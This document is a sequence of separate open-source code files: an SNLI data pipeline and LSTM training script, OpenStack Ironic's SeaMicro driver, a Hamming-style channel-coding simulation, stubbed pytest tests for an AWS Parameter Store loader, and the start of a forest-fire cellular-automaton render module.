file_paths = ['snli_1.0_train.jsonl', 'snli_1.0_dev.jsonl', 'snli_1.0_test.jsonl']
not_t = []
t = ['input', 'support', 'target']
# tokenize and convert to hdf5
# 1. Setup pipeline to save lengths and generate vocabulary
p = Pipeline('snli_example', delete_data)
p.add_path(join(zip_path, file_paths[0]))
p.add_line_processor(JsonLoaderProcessors())
p.add_line_processor(RemoveLineOnJsonValueCondition('gold_label', lambda label: label == '-'))
p.add_line_processor(DictKey2ListMapper(['sentence1', 'sentence2', 'gold_label']))
p.add_sent_processor(ToLower())
p.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
#p.add_sent_processor(NaiveNCharTokenizer(3), not_t)
p.add_token_processor(AddToVocab())
p.add_post_processor(SaveLengthsToState())
p.execute()
p.clear_processors()
p.state['vocab'].save_to_disk()
# 2. Process the data further to stream it to hdf5
p.add_sent_processor(ToLower())
p.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
#p.add_sent_processor(NaiveNCharTokenizer(3), not_t)
p.add_post_processor(ConvertTokenToIdx())
p.add_post_processor(CreateBinsByNestedLength('snli_train', min_batch_size=128))
state = p.execute()
# dev and test data
p2 = Pipeline('snli_example')
p2.copy_vocab_from_pipeline(p)
p2.add_path(join(zip_path, file_paths[1]))
p2.add_line_processor(JsonLoaderProcessors())
p2.add_line_processor(RemoveLineOnJsonValueCondition('gold_label', lambda label: label == '-'))
p2.add_line_processor(DictKey2ListMapper(['sentence1', 'sentence2', 'gold_label']))
p2.add_sent_processor(ToLower())
p2.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
#p2.add_sent_processor(NaiveNCharTokenizer(3), not_t)
p2.add_post_processor(SaveLengthsToState())
p2.execute()
p2.clear_processors()
p2.add_sent_processor(ToLower())
p2.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
#p2.add_sent_processor(NaiveNCharTokenizer(3), not_t)
p2.add_post_processor(ConvertTokenToIdx())
p2.add_post_processor(StreamToHDF5('snli_dev'))
p2.execute()
p3 = Pipeline('snli_example')
p3.copy_vocab_from_pipeline(p)
p3.add_path(join(zip_path, file_paths[2]))
p3.add_line_processor(JsonLoaderProcessors())
p3.add_line_processor(RemoveLineOnJsonValueCondition('gold_label', lambda label: label == '-'))
p3.add_line_processor(DictKey2ListMapper(['sentence1', 'sentence2', 'gold_label']))
p3.add_sent_processor(ToLower())
p3.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
#p3.add_sent_processor(NaiveNCharTokenizer(3), not_t)
p3.add_post_processor(SaveLengthsToState())
p3.execute()
p3.clear_processors()
p3.add_sent_processor(ToLower())
p3.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
#p3.add_sent_processor(NaiveNCharTokenizer(3), not_t)
p3.add_post_processor(ConvertTokenToIdx())
p3.add_post_processor(StreamToHDF5('snli_test'))
p3.execute()
def main():
Logger.GLOBAL_LOG_LEVEL = LogLevel.INFO
#Config.backend = Backends.TENSORFLOW
Config.backend = Backends.TORCH
Config.cuda = True
Config.dropout = 0.1
Config.hidden_size = 128
Config.embedding_size = 256
Config.L2 = 0.00003
do_process = False
if do_process:
preprocess_SNLI(delete_data=True)
p = Pipeline('snli_example')
vocab = p.state['vocab']
vocab.load_from_disk()
batch_size = 128
if Config.backend == Backends.TENSORFLOW:
from spodernet.backends.tfbackend import TensorFlowConfig
TensorFlowConfig.init_batch_size(batch_size)
train_batcher = StreamBatcher('snli_example', 'snli_train', batch_size, randomize=True, loader_threads=8)
#train_batcher.subscribe_to_batch_prepared_event(SomeExpensivePreprocessing())
dev_batcher = StreamBatcher('snli_example', 'snli_dev', batch_size)
test_batcher = StreamBatcher('snli_example', 'snli_test', batch_size)
train_batcher.subscribe_to_events(AccuracyHook('Train', print_every_x_batches=1000))
dev_batcher.subscribe_to_events(AccuracyHook('Dev', print_every_x_batches=1000))
eta = ETAHook(print_every_x_batches=1000)
train_batcher.subscribe_to_events(eta)
train_batcher.subscribe_to_start_of_epoch_event(eta)
model = Model()
model.add(Embedding(128, vocab.num_embeddings))
model.add(PairedBiDirectionalLSTM(128, hidden_size=256, variable_length=True, conditional_encoding=False))
model.add(SoftmaxCrossEntropy(input_size=256*4, num_labels=3))
t = Trainer(model)
for i in range(10):
t.train(train_batcher, epochs=1)
t.evaluate(dev_batcher)
if __name__ == '__main__':
main()
|
<reponame>pyrrrat/moved-ironic
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Ironic SeaMicro interfaces.
Provides basic power control of servers in SeaMicro chassis via
python-seamicroclient.
Provides vendor passthru methods for SeaMicro specific functionality.
"""
import os
import re
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import importutils
import six
from six.moves.urllib import parse as urlparse
from ironic.common import boot_devices
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LW
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.drivers import base
from ironic.drivers.modules import console_utils
seamicroclient = importutils.try_import('seamicroclient')
if seamicroclient:
from seamicroclient import client as seamicro_client
from seamicroclient import exceptions as seamicro_client_exception
opts = [
cfg.IntOpt('max_retry',
default=3,
help=_('Maximum retries for SeaMicro operations')),
cfg.IntOpt('action_timeout',
default=10,
help=_('Seconds to wait for power action to be completed'))
]
CONF = cfg.CONF
opt_group = cfg.OptGroup(name='seamicro',
title='Options for the seamicro power driver')
CONF.register_group(opt_group)
CONF.register_opts(opts, opt_group)
LOG = logging.getLogger(__name__)
_BOOT_DEVICES_MAP = {
boot_devices.DISK: 'hd0',
boot_devices.PXE: 'pxe',
}
REQUIRED_PROPERTIES = {
'seamicro_api_endpoint': _("API endpoint. Required."),
'seamicro_password': _("password. Required."),
'seamicro_server_id': _("server ID. Required."),
'seamicro_username': _("username. Required."),
}
OPTIONAL_PROPERTIES = {
'seamicro_api_version': _("version of SeaMicro API client; default is 2. "
"Optional.")
}
COMMON_PROPERTIES = REQUIRED_PROPERTIES.copy()
COMMON_PROPERTIES.update(OPTIONAL_PROPERTIES)
CONSOLE_PROPERTIES = {
'seamicro_terminal_port': _("node's UDP port to connect to. "
"Only required for console access.")
}
PORT_BASE = 2000
def _get_client(*args, **kwargs):
"""Creates the python-seamicro_client
:param kwargs: A dict of keyword arguments to be passed to the method,
which should contain: 'username', 'password',
'auth_url', 'api_version' parameters.
:returns: SeaMicro API client.
"""
cl_kwargs = {'username': kwargs['username'],
'password': kwargs['password'],
'auth_url': kwargs['api_endpoint']}
try:
return seamicro_client.Client(kwargs['api_version'], **cl_kwargs)
except seamicro_client_exception.UnsupportedVersion as e:
raise exception.InvalidParameterValue(_(
"Invalid 'seamicro_api_version' parameter. Reason: %s.") % e)
def _parse_driver_info(node):
"""Parses and creates seamicro driver info
:param node: An Ironic node object.
:returns: SeaMicro driver info.
:raises: MissingParameterValue if any required parameters are missing.
:raises: InvalidParameterValue if required parameter are invalid.
"""
info = node.driver_info or {}
missing_info = [key for key in REQUIRED_PROPERTIES if not info.get(key)]
if missing_info:
raise exception.MissingParameterValue(_(
"SeaMicro driver requires the following parameters to be set in"
" node's driver_info: %s.") % missing_info)
api_endpoint = info.get('seamicro_api_endpoint')
username = info.get('seamicro_username')
password = info.get('<PASSWORD>')
server_id = info.get('seamicro_server_id')
api_version = info.get('seamicro_api_version', "2")
port = info.get('seamicro_terminal_port')
if port is not None:
port = utils.validate_network_port(port, 'seamicro_terminal_port')
r = re.compile(r"(^[0-9]+)/([0-9]+$)")
if not r.match(server_id):
raise exception.InvalidParameterValue(_(
"Invalid 'seamicro_server_id' parameter in node's "
"driver_info. Expected format of 'seamicro_server_id' "
"is <int>/<int>"))
url = urlparse.urlparse(api_endpoint)
if (not (url.scheme == "http") or not url.netloc):
raise exception.InvalidParameterValue(_(
"Invalid 'seamicro_api_endpoint' parameter in node's "
"driver_info."))
res = {'username': username,
'password': password,
'api_endpoint': api_endpoint,
'server_id': server_id,
'api_version': api_version,
'uuid': node.uuid,
'port': port}
return res
def _get_server(driver_info):
"""Get server from server_id."""
s_client = _get_client(**driver_info)
return s_client.servers.get(driver_info['server_id'])
def _get_volume(driver_info, volume_id):
"""Get volume from volume_id."""
s_client = _get_client(**driver_info)
return s_client.volumes.get(volume_id)
def _get_power_status(node):
"""Get current power state of this node
:param node: Ironic node one of :class:`ironic.db.models.Node`
:raises: InvalidParameterValue if a seamicro parameter is invalid.
:raises: MissingParameterValue if required seamicro parameters are
missing.
:raises: ServiceUnavailable on an error from SeaMicro Client.
:returns: Power state of the given node
"""
seamicro_info = _parse_driver_info(node)
try:
server = _get_server(seamicro_info)
if not hasattr(server, 'active') or server.active is None:
return states.ERROR
if not server.active:
return states.POWER_OFF
elif server.active:
return states.POWER_ON
except seamicro_client_exception.NotFound:
raise exception.NodeNotFound(node=node.uuid)
except seamicro_client_exception.ClientException as ex:
LOG.error(_LE("SeaMicro client exception %(msg)s for node %(uuid)s"),
{'msg': ex.message, 'uuid': node.uuid})
raise exception.ServiceUnavailable(message=ex.message)
def _power_on(node, timeout=None):
"""Power ON this node
:param node: An Ironic node object.
:param timeout: Time in seconds to wait till power on is complete.
:raises: InvalidParameterValue if a seamicro parameter is invalid.
:raises: MissingParameterValue if required seamicro parameters are
missing.
:returns: Power state of the given node.
"""
if timeout is None:
timeout = CONF.seamicro.action_timeout
state = [None]
retries = [0]
seamicro_info = _parse_driver_info(node)
server = _get_server(seamicro_info)
def _wait_for_power_on(state, retries):
"""Called at an interval until the node is powered on."""
state[0] = _get_power_status(node)
if state[0] == states.POWER_ON:
raise loopingcall.LoopingCallDone()
if retries[0] > CONF.seamicro.max_retry:
state[0] = states.ERROR
raise loopingcall.LoopingCallDone()
try:
retries[0] += 1
server.power_on()
except seamicro_client_exception.ClientException:
LOG.warning(_LW("Power-on failed for node %s."),
node.uuid)
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_power_on,
state, retries)
timer.start(interval=timeout).wait()
return state[0]
def _power_off(node, timeout=None):
"""Power OFF this node
:param node: Ironic node one of :class:`ironic.db.models.Node`
:param timeout: Time in seconds to wait till power off is compelete
:raises: InvalidParameterValue if a seamicro parameter is invalid.
:raises: MissingParameterValue if required seamicro parameters are
missing.
:returns: Power state of the given node
"""
if timeout is None:
timeout = CONF.seamicro.action_timeout
state = [None]
retries = [0]
seamicro_info = _parse_driver_info(node)
server = _get_server(seamicro_info)
def _wait_for_power_off(state, retries):
"""Called at an interval until the node is powered off."""
state[0] = _get_power_status(node)
if state[0] == states.POWER_OFF:
raise loopingcall.LoopingCallDone()
if retries[0] > CONF.seamicro.max_retry:
state[0] = states.ERROR
raise loopingcall.LoopingCallDone()
try:
retries[0] += 1
server.power_off()
except seamicro_client_exception.ClientException:
LOG.warning(_LW("Power-off failed for node %s."),
node.uuid)
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_power_off,
state, retries)
timer.start(interval=timeout).wait()
return state[0]
def _reboot(node, timeout=None):
"""Reboot this node.
:param node: Ironic node one of :class:`ironic.db.models.Node`
:param timeout: Time in seconds to wait till reboot is compelete
:raises: InvalidParameterValue if a seamicro parameter is invalid.
:raises: MissingParameterValue if required seamicro parameters are
missing.
:returns: Power state of the given node
"""
if timeout is None:
timeout = CONF.seamicro.action_timeout
state = [None]
retries = [0]
seamicro_info = _parse_driver_info(node)
server = _get_server(seamicro_info)
def _wait_for_reboot(state, retries):
"""Called at an interval until the node is rebooted successfully."""
state[0] = _get_power_status(node)
if state[0] == states.POWER_ON:
raise loopingcall.LoopingCallDone()
if retries[0] > CONF.seamicro.max_retry:
state[0] = states.ERROR
raise loopingcall.LoopingCallDone()
try:
retries[0] += 1
server.reset()
except seamicro_client_exception.ClientException:
LOG.warning(_LW("Reboot failed for node %s."),
node.uuid)
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot,
state, retries)
server.reset()
timer.start(interval=timeout).wait()
return state[0]
def _validate_volume(driver_info, volume_id):
"""Validates if volume is in Storage pools designated for ironic."""
volume = _get_volume(driver_info, volume_id)
# Check if the ironic <scard>/ironic-<pool_id>/<volume_id> naming scheme
# is present in volume id
try:
pool_id = volume.id.split('/')[1].lower()
except IndexError:
pool_id = ""
if "ironic-" in pool_id:
return True
else:
raise exception.InvalidParameterValue(_(
"Invalid volume id specified"))
def _get_pools(driver_info, filters=None):
"""Get SeaMicro storage pools matching given filters."""
s_client = _get_client(**driver_info)
return s_client.pools.list(filters=filters)
def _create_volume(driver_info, volume_size):
"""Create volume in the SeaMicro storage pools designated for ironic."""
ironic_pools = _get_pools(driver_info, filters={'id': 'ironic-'})
if ironic_pools is None:
raise exception.VendorPassthruException(_(
"No storage pools found for ironic"))
least_used_pool = sorted(ironic_pools,
key=lambda x: x.freeSize)[0]
return _get_client(**driver_info).volumes.create(volume_size,
least_used_pool)
def get_telnet_port(driver_info):
"""Get SeaMicro telnet port to listen."""
server_id = int(driver_info['server_id'].split("/")[0])
return PORT_BASE + (10 * server_id)
class Power(base.PowerInterface):
"""SeaMicro Power Interface.
This PowerInterface class provides a mechanism for controlling the power
state of servers in a seamicro chassis.
"""
def get_properties(self):
return COMMON_PROPERTIES
def validate(self, task):
"""Check that node 'driver_info' is valid.
Check that node 'driver_info' contains the required fields.
:param task: a TaskManager instance containing the node to act on.
:raises: MissingParameterValue if required seamicro parameters are
missing.
"""
_parse_driver_info(task.node)
def get_power_state(self, task):
"""Get the current power state of the task's node.
Poll the host for the current power state of the node.
:param task: a TaskManager instance containing the node to act on.
:raises: ServiceUnavailable on an error from SeaMicro Client.
:raises: InvalidParameterValue if a seamicro parameter is invalid.
:raises: MissingParameterValue when a required parameter is missing
:returns: power state. One of :class:`ironic.common.states`.
"""
return _get_power_status(task.node)
@task_manager.require_exclusive_lock
def set_power_state(self, task, pstate):
"""Turn the power on or off.
Set the power state of a node.
:param task: a TaskManager instance containing the node to act on.
:param pstate: Either POWER_ON or POWER_OFF from :class:
`ironic.common.states`.
:raises: InvalidParameterValue if an invalid power state was specified
or a seamicro parameter is invalid.
:raises: MissingParameterValue when a required parameter is missing
:raises: PowerStateFailure if the desired power state couldn't be set.
"""
if pstate == states.POWER_ON:
state = _power_on(task.node)
elif pstate == states.POWER_OFF:
state = _power_off(task.node)
else:
raise exception.InvalidParameterValue(_(
"set_power_state called with invalid power state."))
if state != pstate:
raise exception.PowerStateFailure(pstate=pstate)
@task_manager.require_exclusive_lock
def reboot(self, task):
"""Cycles the power to the task's node.
:param task: a TaskManager instance containing the node to act on.
:raises: InvalidParameterValue if a seamicro parameter is invalid.
:raises: MissingParameterValue if required seamicro parameters are
missing.
:raises: PowerStateFailure if the final state of the node is not
POWER_ON.
"""
state = _reboot(task.node)
if state != states.POWER_ON:
raise exception.PowerStateFailure(pstate=states.POWER_ON)
class VendorPassthru(base.VendorInterface):
"""SeaMicro vendor-specific methods."""
def get_properties(self):
return COMMON_PROPERTIES
def validate(self, task, method, **kwargs):
_parse_driver_info(task.node)
@base.passthru(['POST'])
def set_node_vlan_id(self, task, **kwargs):
"""Sets an untagged vlan id for NIC 0 of node.
@kwargs vlan_id: id of untagged vlan for NIC 0 of node
"""
node = task.node
vlan_id = kwargs.get('vlan_id')
if not vlan_id:
raise exception.MissingParameterValue(_("No vlan id provided"))
seamicro_info = _parse_driver_info(node)
try:
server = _get_server(seamicro_info)
# remove current vlan for server
if len(server.nic['0']['untaggedVlan']) > 0:
server.unset_untagged_vlan(server.nic['0']['untaggedVlan'])
server = server.refresh(5)
server.set_untagged_vlan(vlan_id)
except seamicro_client_exception.ClientException as ex:
LOG.error(_LE("SeaMicro client exception: %s"), ex.message)
raise exception.VendorPassthruException(message=ex.message)
properties = node.properties
properties['seamicro_vlan_id'] = vlan_id
node.properties = properties
node.save()
@base.passthru(['POST'])
def attach_volume(self, task, **kwargs):
"""Attach a volume to a node.
Attach volume from SeaMicro storage pools for ironic to node.
If kwargs['volume_id'] not given, Create volume in SeaMicro
storage pool and attach to node.
@kwargs volume_id: id of pre-provisioned volume that is to be attached
as root volume of node
@kwargs volume_size: size of new volume to be created and attached
as root volume of node
"""
node = task.node
seamicro_info = _parse_driver_info(node)
volume_id = kwargs.get('volume_id')
if volume_id is None:
volume_size = kwargs.get('volume_size')
if volume_size is None:
raise exception.MissingParameterValue(
_("No volume size provided for creating volume"))
volume_id = _create_volume(seamicro_info, volume_size)
if _validate_volume(seamicro_info, volume_id):
try:
server = _get_server(seamicro_info)
server.detach_volume()
server = server.refresh(5)
server.attach_volume(volume_id)
except seamicro_client_exception.ClientException as ex:
LOG.error(_LE("SeaMicro client exception: %s"), ex.message)
raise exception.VendorPassthruException(message=ex.message)
properties = node.properties
properties['seamicro_volume_id'] = volume_id
node.properties = properties
node.save()
class Management(base.ManagementInterface):
def get_properties(self):
return COMMON_PROPERTIES
def validate(self, task):
"""Check that 'driver_info' contains SeaMicro credentials.
Validates whether the 'driver_info' property of the supplied
task's node contains the required credentials information.
:param task: a task from TaskManager.
:raises: MissingParameterValue when a required parameter is missing
"""
_parse_driver_info(task.node)
def get_supported_boot_devices(self, task):
"""Get a list of the supported boot devices.
:param task: a task from TaskManager.
:returns: A list with the supported boot devices defined
in :mod:`ironic.common.boot_devices`.
"""
return list(_BOOT_DEVICES_MAP.keys())
@task_manager.require_exclusive_lock
def set_boot_device(self, task, device, persistent=False):
"""Set the boot device for the task's node.
Set the boot device to use on next reboot of the node.
:param task: a task from TaskManager.
:param device: the boot device, one of
:mod:`ironic.common.boot_devices`.
:param persistent: Boolean value. True if the boot device will
persist to all future boots, False if not.
Default: False. Ignored by this driver.
:raises: InvalidParameterValue if an invalid boot device is
specified or if a seamicro parameter is invalid.
:raises: IronicException on an error from seamicro-client.
:raises: MissingParameterValue when a required parameter is missing
"""
if device not in self.get_supported_boot_devices(task):
raise exception.InvalidParameterValue(_(
"Invalid boot device %s specified.") % device)
seamicro_info = _parse_driver_info(task.node)
try:
server = _get_server(seamicro_info)
boot_device = _BOOT_DEVICES_MAP[device]
server.set_boot_order(boot_device)
except seamicro_client_exception.ClientException as ex:
LOG.error(_LE("Seamicro set boot device failed for node "
"%(node)s with the following error: %(error)s"),
{'node': task.node.uuid, 'error': ex})
raise exception.IronicException(message=six.text_type(ex))
def get_boot_device(self, task):
"""Get the current boot device for the task's node.
Returns the current boot device of the node. Be aware that not
all drivers support this.
:param task: a task from TaskManager.
:returns: a dictionary containing:
:boot_device: the boot device, one of
:mod:`ironic.common.boot_devices` or None if it is unknown.
:persistent: Whether the boot device will persist to all
future boots or not, None if it is unknown.
"""
# TODO(lucasagomes): The python-seamicroclient library currently
# doesn't expose a method to get the boot device, update it once
# it's implemented.
return {'boot_device': None, 'persistent': None}
def get_sensors_data(self, task):
"""Get sensors data method.
Not implemented by this driver.
:param task: a TaskManager instance.
"""
raise NotImplementedError()
class ShellinaboxConsole(base.ConsoleInterface):
"""A ConsoleInterface that uses telnet and shellinabox."""
def get_properties(self):
d = COMMON_PROPERTIES.copy()
d.update(CONSOLE_PROPERTIES)
return d
def validate(self, task):
"""Validate the Node console info.
:param task: a task from TaskManager.
:raises: MissingParameterValue if required seamicro parameters are
missing
:raises: InvalidParameterValue if required parameter are invalid.
"""
driver_info = _parse_driver_info(task.node)
if not driver_info['port']:
raise exception.MissingParameterValue(_(
"Missing 'seamicro_terminal_port' parameter in node's "
"driver_info"))
def start_console(self, task):
"""Start a remote console for the node.
:param task: a task from TaskManager
:raises: MissingParameterValue if required seamicro parameters are
missing
:raises: ConsoleError if the directory for the PID file cannot be
created
:raises: ConsoleSubprocessFailed when invoking the subprocess failed
:raises: InvalidParameterValue if required parameter are invalid.
"""
driver_info = _parse_driver_info(task.node)
telnet_port = get_telnet_port(driver_info)
chassis_ip = urlparse.urlparse(driver_info['api_endpoint']).netloc
seamicro_cmd = ("/:%(uid)s:%(gid)s:HOME:telnet %(chassis)s %(port)s"
% {'uid': os.getuid(),
'gid': os.getgid(),
'chassis': chassis_ip,
'port': telnet_port})
console_utils.start_shellinabox_console(driver_info['uuid'],
driver_info['port'],
seamicro_cmd)
def stop_console(self, task):
"""Stop the remote console session for the node.
:param task: a task from TaskManager
:raises: ConsoleError if unable to stop the console
"""
console_utils.stop_shellinabox_console(task.node.uuid)
def get_console(self, task):
"""Get the type and connection information about the console.
:raises: MissingParameterValue if required seamicro parameters are
missing
:raises: InvalidParameterValue if required parameter are invalid.
"""
driver_info = _parse_driver_info(task.node)
url = console_utils.get_shellinabox_console_url(driver_info['port'])
return {'type': 'shellinabox', 'url': url}
|
<gh_stars>1-10
#!/usr/bin/
# -*- coding: utf-8 -*-
# #--------------------------------main file------------------------------------
# #
# # Copyright (C) 2020 by
# # <NAME> (<EMAIL>)
# # B
# # &
# # B
# # <NAME> (<EMAIL>)
# #
# #-----------------------------------------------------------------------------
# Simulation of source encoding with channel encoding
# Image Source
# ******************************************************
# IMPORTS
# ******************************************************
import sys
sys.path.append("./includes/")
from get_source import *
# ******************************************************
# FUNCTIONS
# ******************************************************
# ### Using an example image
img_direction = './inputs/input0.jpg'
#### Open RGB image - convert to gray
gray_img = get_Data(img_direction)
### Gray image to Binary
binary_img_DATA = binary_inv_threshold(gray_img,"./results/")
###### Read all values from dataBase
complete_bits, bits_high, bits_low, total_counter, low_counter, high_counter = analize_source_data(binary_img_DATA)
############################################################
############ 1
############################################################
print("\n")
print("***********************************************************************")
print(" Verification Stage ")
print("***********************************************************************")
print("\nTOTAL of pixels: ", total_counter )
print("\nThe amount of pixel in HIGH value: ", high_counter )
print("\nThe amount of pixel in LOW value: ", low_counter )
print("\n-----------------------------------------------")
print("Verification -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 2
############################################################
print("\n")
print("***********************************************************************")
print(" Packaging Stage ")
print("***********************************************************************")
print("\n")
n_bit = 7
pkg_data = packaging(complete_bits, n_bit) # 186833x7
# print(pkg_data)
print("\n-----------------------------------------------")
print("Packaging -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 3
############################################################
print("\n")
print("***********************************************************************")
print(" Creating Generator Matrix Stage ")
print("***********************************************************************")
print("\n")
g_matrix = creating_G(pkg_data, n_bit) # 186833x7
print("\n-----------------------------------------------")
print("Create Generator Matrix -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 4
############################################################
print("\n")
print("***********************************************************************")
print(" Packages * Generator Matrix = u Stage ")
print("***********************************************************************")
print("\n")
result_u = pack_X_genM(pkg_data, g_matrix, n_bit) # 186833 x 14
print("\n-----------------------------------------------")
print("Packages * Generator Matrix = u -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 5
############################################################
print("\n")
print("***********************************************************************")
print(" V = U + Noise Stage ")
print("***********************************************************************")
print("\n")
err_porc = 10
v_uNoise = noise(result_u, err_porc, n_bit) # 186833 x 14
print("\n-----------------------------------------------")
print("U + Noise -------> DONE ")
print("-----------------------------------------------\n")
###########################################################
############ 6
############################################################
print("\n")
print("***********************************************************************")
print(" Sindrome Stage ")
print("***********************************************************************")
print("\n")
sindromeMatrix, sindr0c, sindr1c, okC = sindrome(pkg_data, v_uNoise, n_bit)
print("\n-----------------------------------------------")
print("Sindrome -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 8
############################################################
print("\n")
print("***********************************************************************")
print(" Fixing Error Stage ")
print("***********************************************************************")
print("\n")
final_ReceivedData = fixing_err(pkg_data, sindromeMatrix, n_bit, sindr0c, sindr1c, okC)
print("\n-----------------------------------------------")
print("Fixing Error -------> DONE ")
print("-----------------------------------------------\n")
# ############################################################
# ############ FINAL
# ############################################################
print("\n")
inverted_rgb_img= BINARY_RGB(gray_img, "./results/")
|
"""Unit tests for aws parameter store interactions with boto3"""
from __future__ import annotations
from typing import Any
from typing import Generator
from unittest.mock import patch
import pytest
from secretbox.awsparameterstore_loader import AWSParameterStore
boto3_lib = pytest.importorskip("boto3", reason="boto3")
mypy_boto3 = pytest.importorskip("mypy_boto3_ssm", reason="mypy_boto3")
# Isolate boto3 lib requirements, silence flake8 by nesting in if statement
if True:
import botocore.client
import botocore.session
from botocore.client import BaseClient
from botocore.exceptions import StubAssertionError
from botocore.stub import Stubber
TEST_VALUE = "abcdefg"
TEST_LIST = ",".join([TEST_VALUE, TEST_VALUE, TEST_VALUE])
TEST_PATH = "/my/parameter/prefix/"
TEST_REGION = "us-east-1"
TEST_STORE = "my_store"
TEST_STORE2 = "my_store2"
TEST_STORE3 = "my_store3"
TEST_VALUE = "abcdefg"
@pytest.fixture
def valid_ssm() -> Generator[BaseClient, None, None]:
"""
Creates a mock ssm for testing. Response valids are shortened for test
Supports three calls
- .get_parameters_by_path
- No `NextToken`
- `NextToken` exists
- `NextToken` exists
"""
# Matches args in class
expected_parameters = {
"Recursive": True,
"MaxResults": 10,
"WithDecryption": True,
"Path": TEST_PATH,
}
responses: list[dict[str, str]] = []
responses.append(
{
"Name": f"{TEST_PATH}{TEST_STORE}",
"Value": TEST_VALUE,
"Type": "String",
}
)
# Build enough responses to test pagination
for idx in range(0, 26):
responses.append(
{
"Name": f"{TEST_PATH}{TEST_STORE}/{idx}",
"Value": TEST_VALUE,
"Type": "String",
}
)
# Add additonal cases, asserting we collect pagination correctly
responses.append(
{
"Name": f"{TEST_PATH}{TEST_STORE2}",
"Value": TEST_VALUE,
"Type": "SecureString",
}
)
responses.append(
{
"Name": f"{TEST_PATH}{TEST_STORE3}",
"Value": TEST_LIST,
"Type": "StringList",
}
)
call_one = {"Parameters": responses[0:9], "NextToken": "callone"}
call_two = {"Parameters": responses[10:19], "NextToken": "calltwo"}
call_three = {"Parameters": responses[20:29]}
ssm_session = botocore.session.get_session().create_client(
service_name="ssm",
region_name=TEST_REGION,
)
with Stubber(ssm_session) as stubber:
stubber.add_response(
method="get_parameters_by_path",
service_response=call_one,
expected_params=expected_parameters,
)
stubber.add_response(
method="get_parameters_by_path",
service_response=call_two,
expected_params=dict(**expected_parameters, NextToken="callone"),
)
stubber.add_response(
method="get_parameters_by_path",
service_response=call_three,
expected_params=dict(**expected_parameters, NextToken="calltwo"),
)
yield ssm_session
@pytest.fixture
def invalid_ssm() -> Generator[BaseClient, None, None]:
"""
Creates a mock ssm for testing. Response is a ClientError
"""
# Matches args in class
expected_parameters = {
"Recursive": True,
"MaxResults": 10,
"WithDecryption": True,
"Path": TEST_PATH,
}
ssm_session = botocore.session.get_session().create_client(
service_name="ssm",
region_name=TEST_REGION,
)
with Stubber(ssm_session) as stubber:
stubber.add_client_error(
method="get_parameters_by_path",
service_error_code="ResourceNotFoundException",
service_message="Mock Client Error",
http_status_code=404,
expected_params=expected_parameters,
)
yield ssm_session
@pytest.fixture
def loader() -> Generator[AWSParameterStore, None, None]:
"""Pass an unaltered loader"""
loader = AWSParameterStore()
yield loader
@pytest.fixture
def stub_loader(valid_ssm: BaseClient) -> Generator[AWSParameterStore, None, None]:
"""Wraps AWS client with Stubber"""
store = AWSParameterStore()
with patch.object(store, "get_aws_client", return_value=valid_ssm):
yield store
@pytest.fixture
def broken_loader(invalid_ssm: BaseClient) -> Generator[AWSParameterStore, None, None]:
"""Pass a loader that raises ClientError"""
store = AWSParameterStore()
with patch.object(store, "get_aws_client", return_value=invalid_ssm):
yield store
def test_stubber_passed_for_client(stub_loader: AWSParameterStore) -> None:
assert isinstance(stub_loader.get_aws_client(), BaseClient)
def test_parameter_values_success_load(stub_loader: AWSParameterStore) -> None:
assert stub_loader.load_values(
aws_sstore_name=TEST_PATH,
aws_region_name=TEST_REGION,
)
assert stub_loader.loaded_values.get(TEST_STORE) == TEST_VALUE
assert stub_loader.loaded_values.get(TEST_STORE2) == TEST_VALUE
assert stub_loader.loaded_values.get(TEST_STORE3) == TEST_LIST
def test_loading_wrong_prefix(stub_loader: AWSParameterStore) -> None:
# Catch this as an unhappy path. Outside of a stubber this would return nothing
with pytest.raises(StubAssertionError):
assert stub_loader.load_values(
aws_sstore_name=TEST_STORE,
aws_region_name=TEST_REGION,
)
def test_missing_store_name(loader: AWSParameterStore, caplog: Any) -> None:
assert loader.load_values()
assert "Missing parameter name" in caplog.text
def test_missing_region(loader: AWSParameterStore, caplog: Any) -> None:
assert not loader.load_values(aws_sstore_name=TEST_STORE)
assert "Invalid SSM client" in caplog.text
def test_client_error_catch_on_load(broken_loader: AWSParameterStore) -> None:
assert not broken_loader.load_values(
aws_sstore_name=TEST_PATH,
aws_region_name=TEST_REGION,
)
def test_client_with_region(loader: AWSParameterStore) -> None:
loader.aws_region = TEST_REGION
assert loader.get_aws_client() is not None
|
"""
The render of the bulldozer consists of four subplots:
1. Local Grid
+ Grid centered at current position, visualizes agent's micromanagment
2. Global Grid
+ Whole grid view, visualizes agent's strategy
3. Gauge
+ Shows time until next CA update
4. Counts
+ Shows Forest vs No Forest cell counts. Translates on how well the agent is doing.
"""
import matplotlib.pyplot as plt
import numpy as np
from gym_cellular_automata.forest_fire.utils.neighbors import moore_n
from gym_cellular_automata.forest_fire.utils.render import (
EMOJIFONT,
TITLEFONT,
align_marker,
clear_ax,
get_norm_cmap,
parse_svg_into_mpl,
plot_grid,
)
from . import svg_paths
from .config import CONFIG
# Figure Globals
FIGSIZE = (15, 12)
FIGSTYLE = "seaborn-whitegrid"
TITLE_SIZE = 42
TITLE_POS = {"x": 0.121, "y": 0.96}
TITLE_ALIGN = "left"
COLOR_EMPTY = "#DDD1D3" # Gray
COLOR_BURNED = "#DFA4A0" # Light-Red
COLOR_TREE = "#A9C499" # Green
